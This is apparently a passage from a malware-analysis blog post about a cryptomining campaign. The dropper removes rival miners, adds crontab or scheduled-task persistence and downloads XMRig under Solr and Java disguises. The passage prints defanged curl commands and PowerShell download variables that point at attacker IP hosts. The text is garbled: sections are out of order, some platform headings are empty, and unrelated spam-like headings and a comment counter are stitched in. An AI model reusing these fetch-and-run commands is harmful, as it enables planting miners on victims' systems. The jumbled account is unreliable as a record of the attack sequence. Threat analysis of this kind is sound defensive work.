\nNext it sets the System File, Hidden File and Read-Only attributes for the newly downloaded miner files, and starts the miner process.\n\nLast step is executing the clean-up batch script, and termination of the powershell.exe process.\n\n# Attacker Origin\n\nThe threat actors\u2019 TTP (tactics, techniques, procedures) aren\u2019t new and we\u2019ve seen similar attack campaigns in the past.
#XMRIG HASH CALCULATOR UPDATE#
\nUsing the custom Update function, it downloads the miner executable and config files by passing the variables set earlier to the said function.
#XMRIG HASH CALCULATOR WINDOWS#
+'\n\n# Dropper Script Analysis\n\nAs mentioned earlier, the first part of the dropper scripts are performing the removal of competing crypto mining processes and their related files.\n\nOn Linux systems:\n\nOn Windows systems:\n\nIn the next step, the script establishes persistence by adding a crontab/scheduled task, and downloads additional files from publicly available platforms that can sometimes host malwares (pastebin).\n\nOn Linux systems:\n\nOn Windows systems:\n\nThe script then finally downloads the XMRig cryptocurrency miner files.\n\nThe files are then written to temporary locations, masked as legitimate services/executables.\n\nAnd finally, the script starting the XMRig mining and execution of post-exploitation scripts is done separately.\n\nThe set of actions described above is executed differently based on the target operating system.\n\nOn Linux systems:\n\nDownloaded XMRig cryptocurrency miner files: \ncurl -fsSL hxxp://2711348080/docs/s/config.json -o /tmp/.solr/config.json - Miner Config file \ncurl -fsSL hxxp://22212247272143/auth/solrd.exe -o /tmp/.solr/solrd - XMRig Miner \ncurl -fsSL hxxp://2711348080/docs/s/solr.sh -o /tmp/.solr/solr.sh - XMRig Miner starter script\n\nThe script then executes the solr.sh miner starter script which in turn executes solrd, which is the XMRig Miner file that starts the mining process.\n\nOn Windows systems: \nFirst some variables are set, followed by a custom function (function Update($url,$path,$proc_name) that performs file downloads using the WebClient.DownloadFile Method using a object, \nwhich is used later in the script:\n\nXMRig miner executable, miner name and path: \n$miner_url = 'hxxp://22212247272143/auth/xmrig.exe' \n$miner_name = 'javae' \n$miner_path = '$env:TMP\\javae.exe' \n\n\nMiner configuration file, name and path: \n$miner_cfg_url = 'hxxp://2711348080/docs/s/config.json' \n$miner_cfg_name = 'config.json' \n$miner_cfg_path = '$env:TMP\\config.json' \n\n\nClean-up batch script (clean.bat), name and path: \n$killmodule_url = 'hxxp://2711348080/examples/clean.bat' \n$killmodule_name = 'clean.bat' \n$killmodule_path = '$env:TMP\\clean.bat' \n\n\nAfter the script variables are set, the script then performs the following actions:\n\nClears the System File, Hidden File and Read-Only attributes for any previously installed miner configuration files (config.json), and deletes their relevant files and folders.
0 kommentar(er)
